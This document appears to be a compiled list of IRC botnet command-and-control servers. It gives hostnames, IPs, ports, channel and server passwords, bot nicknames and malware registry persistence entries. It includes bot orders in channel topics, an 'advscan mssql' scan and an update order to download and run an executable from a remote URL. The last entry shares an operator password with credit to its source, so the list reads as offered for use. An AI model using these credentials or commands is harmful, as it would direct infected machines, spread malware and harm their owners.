tbt1.crabdance.com

tbt1.crabdance.com 58.137.9.88 C&C Server: 58.137.9.88:9595 Server Password: Username: hhhya Nickname: DEU|XP|SP3|00|2600|L|9157 Channel: ##nzm2 (Password: psy) Channeltopic: :@advscan mssql 50 5 0 -b -l Resolved : [tbt1.crabdance.com] To [58.137.9.88] Resolved : [tbt1.crabdance.com] To [202.170.81.163] Resolved : [tbt1.crabdance.com] To [94.141.68.98] hosting infos: http://whois.domaintools.com/58.137.9.88

95.211.84.164

Remote Host Port Number 95.211.84.164 6567 PASS pr1v4d0onl1n3r MODE [SI|USA|00|P|44222] -ix JOIN #update1# c1rc0s0leil PONG Coupe.Network NICK [SI|USA|00|P|44222] USER XP-2179 * 0 :COMPUTERNAME * The following port was open in the system: Port Protocol Process 1055 TCP Sontiwin.exe (%Windir%Sontiwin.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Ci Servs = “Sontiwin.exe”

legend.rootyou.org

legend.rootyou.org 83.217.70.132 Opened listening TCP connection on port: 113 * C&C Server: 83.217.70.132:443 * Server Password: * Username: yxvypn * Nickname: yxvypn * Channel: #spybot (Password: chanpass) * Channeltopic: * C&C Server: 83.217.70.132:443 * Server Password: * Username: rrtd * Nickname: rrtd * Channel: (Password: ) * Channeltopic: * C&C Server: 83.217.70.132:443 * Server Password:

78.46.21.247

Remote Host Port Number 78.46.21.247 6680 PING hell1410.zapto.org USER [NEW|7755] False * :kBotv5 NICK [NEW|7755] JOIN #cutugno PONG :You have not registered JOIN ##USA Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + dll = “%AppData%dllsvchost.exe” so that svchost.exe runs every time Windows starts * The following Registry Value was modified: o

n.main-update.com

* The following Host Name was requested from a host database: o n.main-update.com * There was registered attempt to establish connection with the remote host. The connection details are: Remote Host Port Number n.main-update.com 81 Resolved : [n.main-update.com] To [173.203.101.190] Resolved : [n.main-update.com] To [212.117.180.158] Resolved : [n.main-update.com] To [173.203.96.94] NICK n[USA|XP]7592447 USER s “”

67.210.170.178(linkbot)

Remote Host Port Number 67.210.170.178 4676 USER cuqlkd cuqlkd cuqlkd :ussomchqqwibaimo NICK d[SchPopm]b * The following port was open in the system: Port Protocol Process 1053 TCP algs.exe (%System%algs.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Application Layer Gateway Service = “%System%algs.exe” so that algs.exe runs every time Windows starts

irc.anzimazor.info

* The following Host Name was requested from a host database: o irc.anzimazor.info * There was registered attempt to establish connection with the remote host. The connection details are: Remote Host Port Number irc.anzimazor.info 1010 NICK n{USA|XP}xjjabpb USER n{USA|XP}xjjabpb 0 0 :n{USA|XP}xjjabpb Registry Modifications * The following Registry Key was created: o HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionApp * The

94.228.214.218

94.228.214.218 (1337) chanel: #swarm passwd: swarm Topic is ‘.xupdatex http://myprivatefile.com/out.exe !update http://myprivatefile.com/out.exe’

Server :google.com(Srblche’s 3k net)

just.addsyrup.net:6667 Resolved : [just.addsyrup.net] To [93.190.140.165] 93.190.140.165 (6667) Invisible Users: 1370 Operators: 9 operator(s) online Channels: 73 channels formed Clients: I have 1382 clients and 1 servers Local users: Current Local Users: 1382 Max: 3868 Global users: Current Global Users: 1391 Max: 3868 Now talking in #.x.# Topic 11 On: [ #.x.# ] [ ]

Irc.snci.Com

201.20.124.44 (2222) 94.190.69.58 (5555) chanel #vnc# /oper snc skifteri same oper and pass in 2 ircd’s credits to cookz for his oper paswd